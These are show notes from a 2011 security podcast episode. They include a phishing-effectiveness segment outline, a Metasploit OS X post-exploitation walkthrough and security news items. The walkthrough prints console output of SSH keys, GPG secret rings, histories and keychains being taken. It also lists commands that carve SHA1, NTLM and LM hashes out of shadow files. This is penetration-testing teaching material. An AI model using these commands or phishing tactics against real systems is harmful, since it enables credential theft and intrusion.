Announcements

PaulDotCom Security Weekly - Episode 232 for Thursday February 24th, 2011.

• Wednesday, March 9th, 2011 at 2pm EST, PaulDotCom will present the Wireless "Security" edition of Cyber Security World's Security Fail Monthly Webcast.

• Be sure to catch our tune in next week for a special guest tech segment by Sharon Conheady and our old friend G W Ray Davidson on the show.

• Paul, Larry, and Darren will be attending the Mid-Atlantic CCDC competition in Columbia, MD from March 10-12, 2011. Larry does badges, Paul will be the "MC", and Darren will serve us beer and coffee. Open to the public, check out the full agenda.

Guest Interview: Mike Murray

Download the Audio (MP3) Version of this segment here!

Mike Murray is a Managing Partner of MAD Security, LLC, where he leads engagements to help corporate and government customers understand and protect their security organization and is also responsible for the advanced curriculum at The Hacker Academy. Mike is here to convince YOU that the most important system to focus on in information security is the human and organizational system

Mike’s thoughts on security can be found on his blog while his work on building careers can be found at InfoSecLeaders.com and ConnectedCareer.com.

Guest Interview: Mike Murr

Mike Murr is a computer scientist who specializes in the domain of forensic computing. He writes the Forensic Computing blog and teaches for the SANS Institute.

Tech Segment: Murr and Murray: "The top 5 most overlooked keys to phishing success"

Also, I'll want to post a couple of links to pages that we'll talk about: specifically, the Flesch Grade Level Calculator and the spam check tester.

While we spend epic amounts of time getting our exploits and payloads perfect (even if we’re using SET), far too often we see testers using stock emails or variants of canned emails that they’ve been taught to use without thinking about the real keys to getting their emails read and acted upon. So, in this Pauldotcom episode, I wanted to share my five most-often overlooked secrets to making sure that your email phishing works. On this episode, we're going to cover some quick thoughts on:

1. The Subject Line
2. The Email Address
3. Salutations and Signatures
4. Getting Past the Gatekeeper
5. Sounding Right - The Flesch Test

Tech Segment: Carlos: "Skinning the Cat, Post Exploitation enumeration on OSX"

On today's tech segment we will cover 2 new enumeration modules against OSX machines that where added to Metasploit. This modules are:

- use post/osx/gather/enum_osx

- use post/osx/gather/hashdump

We will cover the shell commands used by the modules themselves. One of the advantages of post exploitation modules versus the typical meterpreter script is that they can be written to be used against both shell and meterpreter. This initial OS X modules are written and tested for shell but many of the tasks are already written to work for Meterpreter once some issues with the Java Meterpreter are fixed.

Lets start with the OS X Enumeration module. For reasons of demo you will see that we have 2 shell sessions:

msf exploit(handler) > sessions

Active sessions
===============

 Id  Type       Information  Connection
 --  ----       -----------  ----------
 1   shell osx               192.168.1.100:4446 -> 192.168.1.100:54010
 2   shell osx               192.168.1.100:4446 -> 192.168.1.100:54013

Session 1 is running as a regular user on a OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration script will alter its behavior depending on the privilege level it sees it has on the target box and also will alter the commands depending on the version of OSX it is running against. To select the module we use the use command and after selecting we can have a look at the info of the module and the options it provides:

msf exploit(handler) > use post/osx/gather/enum_osx 
msf post(enum_osx) > info

      Name: Mac OS X Information Enumeration
    Module: post/osx/gather/enum_osx
   Version: 11816
  Platform: OSX
      Arch: 
      Rank: Normal

Provided by:
 Carlos Perez <carlos_perez@darkoperator.com>

Description:
 This module does initial gathering of information from OSX Tiger, 
 Leopard and Snow Leopard System


msf post(enum_osx) > show options

Module options (post/osx/gather/enum_osx):

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

To specify a session to run against we just set the option in the Datastore to the number of the session we want to run against

msf post(enum_osx) > set SESSION 1
SESSION => 1

once we have a session selected the only thing we need to do is issue the command run

msf post(enum_osx) > run

[*] Running module against loki.local
[*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303
[*]     Enumerating Development Tools
[*]     Enumerating Airport
[*]     Enumerating Applications
[*]     Enumerating Ethernet
[*]     Enumerating Bluetooth
[*]     Enumerating Logs
[*]     Enumerating Known Networks
[*]     Enumerating Firewall
[*]     Enumerating USB
[*]     Enumerating OS
[*]     Enumerating Network
[*]     Enumerating StartUp
[*]     Enumerating Printers
[*]     Enumerating Preference Panes
[*]     Enumerating Frameworks
[*]     Enumerating Environment Variables
[*]     Enumerating UDP Connections
[*]     Enumerating TCP Connections
[*]     Enumerating Current Activity
[*]     Enumerating Process List
[*]     Enumerating Last Boottime
[*]     Enumerating Groups
[*]     Enumerating Users
[*] .ssh Folder is present
[*]     Downloading config
[*]     Downloading id_dsa
[*]     Downloading id_dsa.pub
[*]     Downloading known_hosts
[*] .gnupg Folder is present
[*]     Downloading gpg.conf
[*]     Downloading pubring.gpg
[*]     Downloading pubring.gpg~
[*]     Downloading random_seed 
[*]     Downloading secring.gpg
[*]     Downloading trustdb.gpg
[*] Capturing screenshot
[*] Screenshot Captured
[*] Extracting bash history
[*]     History file .bash_history found for cperez
[*]     Downloading .bash_history
[*]     History file .irb_history found for cperez
[*]     Downloading .irb_history
[*]     History file .scapy_history found for cperez
[*]     Downloading .scapy_history
[*]     History file .sh_history found for cperez
[*]     Downloading .sh_history
[*]     History file .sqlite_history found for cperez
[*]     Downloading .sqlite_history
[*] Enumerating and Downloading keychains for cperez
[*] Post module execution completed
msf post(enum_osx) > 

As it can be seen the modules gathers a lot of data on the target system starting with configuration, network connection, account information and list of processes, Once it gets all of that info it will check for .ssh and ,gnupg configuration folders and download all configuration files down to the attackers machine. It will do a screen capture followed by the enumeration of any history file found in the users home folder and downloads those. If it is running as root it will extract the SHA1 hashes for the users on the box, if the box is sharing a Smaba Share or talks to AD it will also extract the NTLM and LM hashes for the users creating separate files in john format for each encryption scheme.

Most of the data collected for configuration is gathered using the system_profiler command, it works by specifying the data type which correspond to a configuration are that we want the information for, to list the supported data types we run the command with -listDataTypes:

loki:~ cperez$ system_profiler -listDataTypes
Available Datatypes:
SPHardwareDataType
SPNetworkDataType
SPSoftwareDataType
SPParallelATADataType
SPAudioDataType
SPBluetoothDataType
SPCardReaderDataType
SPDiagnosticsDataType
SPDiscBurningDataType
SPEthernetDataType
SPFibreChannelDataType
SPFireWireDataType
SPDisplaysDataType
SPHardwareRAIDDataType
SPMemoryDataType
SPPCIDataType
SPParallelSCSIDataType
SPPowerDataType
SPPrintersDataType
SPSASDataType
SPSerialATADataType
SPUSBDataType
SPAirPortDataType
SPFirewallDataType
SPNetworkLocationDataType
SPModemDataType
SPNetworkVolumeDataType
SPWWANDataType
SPApplicationsDataType
SPDeveloperToolsDataType
SPExtensionsDataType
SPFontsDataType
SPFrameworksDataType
SPLogsDataType
SPManagedClientDataType
SPPrefPaneDataType
SPStartupItemDataType
SPSyncServicesDataType
SPUniversalAccessDataType

For connection the netstat command is used

• netstat -np tcp

• netstat -np udp

To get Envirinment variables we used

• printenv

For Boot Time and current activity the who command

• who -b

• who

For processes

• ps -ea

For enumerating users and groups it varies per version of the OS, for Leopard and above:

• dscacheutil -q user

•dscacheutil -q group

For Tiger and bellow:

• lookupd -q user

• lookups -q group

For Screenshot of the following command is used:

• As Root: launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg

• As User: screencapture -x screenshot.jpg

For history files the following regex is used to match the most common history file names

• \.\w*\_history

This will match any hidden file with the word history at the end.

For dumping hashes the module must run as root, OS X does not store the credentials in a passed or master.passwd file but more like HPUX Trusted mode in individual files by account. Firs thing is we need to get the GUID of the account to do this we run

Leopard and Above:

• dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-

Tiger:

• niutil -readprop . /users/{user} generateduid

Now with the GUID we can carve the file with the hashes, the modules carves out SHA, LM and NTLM hashes:

• SHA1: /bin/cat /var/db/shadow/hash/{guid} | cut -c169-216

• NTLM: /bin/cat /var/db/shadow/hash/{guid} | cut -c1-32

• LM: /bin/cat /var/db/shadow/hash/{guid} | cut -c33-64

The last thing the module does is enumerate all keychain files for the users and download them:

• As User: security list-keychains

• As Root: sudo -u {username} -i /usr/bin/security list-keychains

Stories For Discussion

Larry's Stories

1. in a BIND - [Larry] - Whoops. a DoS condition with certain versions of BIND when performing an IXFR with a specially crafted request causes the DNS server to stop responding. Yuck - we all know how well the intertubes work without DNS…
2. Deleting data from Flash drives - [Larry] - This is something that we've known about, since the inception of SSD type storage, however people are just starting to catch on, again. So, why is this the case? The chips themselves reserve an extra 10% for dealing with failures, and it is damned near impossible to access the drive at a lave that can either see it, or wipe it. The only way you are getting access to the data is by soldering the chips to a different boar that doesn't know about the bad areas…
3. Smartphone attacks overdramatized - [Larry] - Holy crap, do I not agree with this article in the least. The general consensus form the article is that, because we can count the number of actual mobile malware infections on one hand, we should take a lackadaisical attitude towards it because: The phones are typically more "closed" making it more difficult to exploit (cough, bullshit, cough), the only way of infiltrating is through an app store (oh sure, every line of code is examined, even through "third party" stores) and Windows is still dominant, versus a plethora of smartphone software and OS versions (I call bullshit here too. Just think about the times you've tried to exploit a box but it was the wrong service pack, language, or point version of an application). Instead, how about chilling out about it, how about we make the industry BETTER around smartphone security before we end up with a shitstorm of activity…
4. Suing Gogole for being associated with Porn - [Larry] - Man searches his name on Google, and the results come back for him, and some explicit stuff. Now he sues for Defamation, because google associates him with adult content. google-image-search-John-Strand might have a case here. I mean, really, are you that dense…

Paul's Stories

1. Bind DNS - The new Internet Kill Switch - [PaulDotCom] - I still maintain that attackers will not take down the Internet, for the most part. So, there are types of attackers that want to do damage, so-called "Hacktivism" groups. However, these tend to be more targeted attacks, such as the DDoS attacks launched by Anonymous against Paypal and other credit card companies. Most of the attackers are out there making big money on the Internet, and can't afford massive outages. Reports are that there is no public exploit, which I neve believe. I just believe we haven't seen one in use. I relate it to the mafio. If you study Mafia history, you know its tough for a bunch of criminals to get along. They try to avoid a full-scale war within the familes because "War is bad for business". Of course, they are criminals, and it happens from time to time, but for the most part is (criminal) business as usual.
2. Corporate Security and "The Gmail Generation" - [PaulDotCom] - A new study has been released reporting that 85 percent of workers under 25 use peronal email for work purposes. Now, on one hand, I can see why. A Gmail account is a great thing! It has plenty of storage and you don't get those emails nagging you to clean out your inbox. Its easy to access from anywhere there is a web browser. Mobile access to your email is easy too, several apps make it a sinch to read and respond to emails. The SPAM filtering is awesome. There are typically less restrict policies on email attachment types and size. Given all those factors, it makes it really tough to provide the same level of service to your employees when it comes to corporate email. Maybe we need to step-up the level of service we provide to employees for email, or just move everything to the cloud? OF course, there are grave security risks associated with storing email, and attachments, on public "could" services. Is it just me, or have we still not figured out how to implement email encryption that would ease the transition to the email cloud providers doing an awesome job at providing email services to the masses.
3. Security Is Frustrating - [PaulDotcom] - And this is why we drink. Dave explores the reasons why people do things like MAC address filtering and hiding their SSID, instead of using strong passwords. We see this happen a lot in the corporate world too, people implement the security that is easy, not what works. Seems to me there needs to be a shift of focus. Lets focus on the hard stuff, like passwords, authentication, physical security, client security, and other stuff that I have probably told people they need to do, but yet we keep marching down the Firewall/IDS/IPS/Anti-Virus route. Dave brings up two more great points: People think they don't have to defend against the best hacker's in the world, yet the best hackers in the world create tools that people use. AND, questions why we are doing things backwards, as in using simple passwords but implementing hidden SSIDs and MAC filtering.
4. Where's the BEEF? - [pauldotcom] - The beef is now in ruby. W00t? It has been re-written from the ground up. Now it features a payload for iIOS that makes calls via Skype, in the background. HOT! It has all sorts of nasty stuff. This should be in every pen tester's toolkit. No data on your web site? That matters little. If your user's visit yoru web site, fear, fear the BEEF!